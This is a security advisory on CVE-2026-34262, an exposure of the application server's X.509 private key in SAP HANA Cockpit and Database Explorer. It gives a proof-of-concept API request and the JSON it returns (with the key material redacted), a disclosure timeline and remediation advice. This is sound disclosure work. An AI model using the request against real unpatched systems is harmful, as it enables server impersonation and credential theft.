Exposed Private Key of X.509 Certificate in SAP HANA Cockpit & SAP HANA Database Explorer

Title

Exposed Private Key of X.509 Certificate

Product

SAP HANA Cockpit & SAP HANA Database Explorer

Vulnerable Version

HANA Cockpit <2.18.2 (HRTT <2.16.254002)

Fixed Version

HANA Cockpit 2.18.2 (HRTT 2.16.254002)

CVE Number

CVE-2026-34262

Impact

high

Homepage

https://www.sap.com/

Found

24.04.2025

By

Ben Samtleben (Office Berlin), Bernd Kaufmann (Office Vienna) | SEC Consult Vulnerability Lab

Management summary

SAP HANA Cockpit users with access to the Database Explorer could retrieve the private keys of X.509 certificates. This could be used to impersonate the application server on network level, allowing an attacker to obtain user credentials or other sensitive data. The software patch provided by SAP does not suffice to completely mitigate the security risk. The affected X.509 certificates and corresponding private keys need to be revoked and rotated manually.

Vendor description

"SAP is one of the world’s leading producers of software for the management of business processes."

Source: https://www.sap.com/about/what-is-sap.html 

"SAP HANA cockpit is the main administration tool for SAP HANA. The SAP HANA cockpit provides tools for the administration and monitoring of SAP HANA databases (databases), and for development capabilities through the SAP HANA database explorer."

Source: https://help.sap.com/docs/SAP_HANA_COCKPIT/df02d156db744412ad1f9e887aba68ad/ab5d442cc8a340fea07c15ef6f8eb537.html 

Business recommendation

The vendor provides a patch which should be installed immediately, see SAP Security Note 3730639.

This patch does not completely mitigate the risk that the private keys were obtained by an attacker in the past. Therefore, SEC Consult strongly recommends rotating the affected X.509 certificates and corresponding private keys - even if this is currently not mentioned in the SAP Security Note.

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.

Vulnerability overview/description

1) Exposed Private Key of X.509 Certificate in SAP HANA Cockpit (CVE-2026-34262)

SAP HANA Cockpit users with access to the Database Explorer can obtain the X.509 certificate issued to the application server and its corresponding private key. This information can be used to impersonate the application server on network level, allowing an attacker to obtain user credentials or other sensitive data. The issue arises if mutual TLS (mTLS) is configured for communication with the SAP HANA database.

Proof of concept

1) Exposed Private Key of X.509 Certificate in SAP HANA Cockpit (CVE-2026-34262)

When accessing the Database Explorer via the SAP HANA Cockpit, the following HTTP request is sent to the HRTT service in the background:

GET /hrtt-service/sap/hana/cst/api/v2/databases HTTP/1.1
Host: hana-cockpit-web-app.example.org:31033
Cookie: JSESSIONID=[...]
[...]
The server response contains a list of all available databases.
{
   "__count": 6,
   "d": {
       "results": [
           {
               "__metadata": {
                   "uri": "/sap/hana/cst/api/v2/databases('C123456789')",
                   "type": "database.Database"
               },
               "id": "C123456789",
               "group_id": 0,
               "catalog_name": "SID@SID",
               "type": "COCKPIT_RESOURCE",
               "disabled": false,
               "has_login": false,
               "cockpit_resource_id": 123456789,
               "database_product_name": "HANA",
               "options": {
                   "schema_filter": "[]"
               },
               "set_xs_applicationuser": true,
               "hdl_support_sof": false
           },
           // [... more entries here...]
       ]
   }
}

However, the response can vary - most likely depending on other HTTP requests that have been sent. A more verbose response can be triggered by manually interacting with the Database Explorer and then repeating the request. (No database credentials are needed.) Then, the following information is returned:

{
   "__count": 6,
   "d": {
       "results": [
           {
               "__metadata": {
                   "uri": "/sap/hana/cst/api/v2/databases('C123456789')",
                   "type": "database.Database"
               },
               "id": "C123456789",
               "group_id": 0,
               "catalog_name": "SID@SID",
               "type": "COCKPIT_RESOURCE",
               "disabled": false,
               "has_login": false,
               "cockpit_resource_id": 123456789,
               "database_product_name": "HANA",
               "cockpit_resource_name": "SID@SID",
               "options": {
                   "hosts": [
                       {
                           "host": "isidhdb01.example.org",
                           "port": "31013"
                       }
                   ],
                   "databaseName": "SID",
                   "encrypt": true,
                   "ca": [
                       "-----BEGIN CERTIFICATE-----\nMII[... certificate removed ...]zg==\n-----END CERTIFICATE-----\n",
                       "-----BEGIN CERTIFICATE-----\nMII[... certificate removed ...]c4=\n-----END CERTIFICATE-----\n",
                   ],
                   "sslValidateCertificate": true,
                   "key": [
                       "-----BEGIN PRIVATE KEY-----MII[... private key removed ...]8tQ==-----END PRIVATE KEY-----"
                   ],
                   "cert": [
                       "-----BEGIN CERTIFICATE-----MII[... certificate removed ...]QHvC-----END CERTIFICATE----------BEGIN CERTIFICATE-----MII[...]yotP-----END CERTIFICATE-----"
                   ],
                   "schema_filter": "[]"
               },
               "set_xs_applicationuser": true,
               "hdl_support_sof": false
           }
           // [... more entries here...]
       ]
   }
}

The HTTP response does not only leak additional metadata, but most importantly an X.509 certificate chain and the private key of the leaf certificate. This certificate is issued to the application server hosting the SAP HANA Cockpit, not to the database server.

The vulnerability can be reproduced with the Cockpit Administrator and the Cockpit User role, so it does not require administrative privileges.

Vulnerable / tested versions

The following versions are affected:

  • SAP HANA Cockpit versions prior to 2.18.2 (SAP HANA Runtime Tools prior to 2.16.254002)

Vendor contact timeline

2025-07-01 Contacting vendor through vulnerability submission web form, receiving automatic confirmation.
2025-10-13 Recontacting vendor via email after no response.
2025-10-17 Vendor responds, declaring the issue "resolved" by Aug 30 without further details.
2025-10-29 Inquiring about assigned CVE or SAP Security Note.
2025-11-12 Sending reminder after no response.
2025-11-28 Sending another reminder, still no response.
2025-12-03 Vendor responds with the version containing the patch; states that no CVE will be assigned.
2025-12-05 Contacting vendor, emphasizing that SAP Security Note and CVE are essential to inform customers and make them rotate their certificates.
2025-12-10 Vendor responds, requesting time to clarify with internal stakeholders.
2026-02-11 Contacting the vendor again, asking for any updates.
2026-02-12 Vendor responds, reiterating patched version, no mention of SAP Security Note or CVE.
2026-02-12 Reminding vendor of importance of notifying affected customers due to required certificate rotation.
2026-02-25 Contacting MITRE regarding CVE assignment dispute.
2026-02-27 Vendor agrees to issuing SAP Security Note and asks to wait with public disclosure.
2026-04-14 SAP Security Note 3730639 (CVE-2026-34262) is published by the vendor.
2026-04-15 Public release of advisory

Solution

According to SAP, the vulnerability was fixed in SAP HANA Cockpit version 2.18.2 (HRTT version 2.16.254002).
For information on the available patch, please see SAP Security Note 3730639.

However, this does not completely mitigate the risk that the private keys were obtained by an attacker in the past. Therefore, SEC Consult strongly recommends rotating the affected X.509 certificates and corresponding private keys - even if this is currently not mentioned in the SAP Security Note.

Workaround

None

Advisory URL

https://sec-consult.com/vulnerability-lab/

 

EOF Ben Samtleben, Bernd Kaufmann / @2026

 

Interested to work with the experts of SEC Consult? Send us your application.
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices.

Back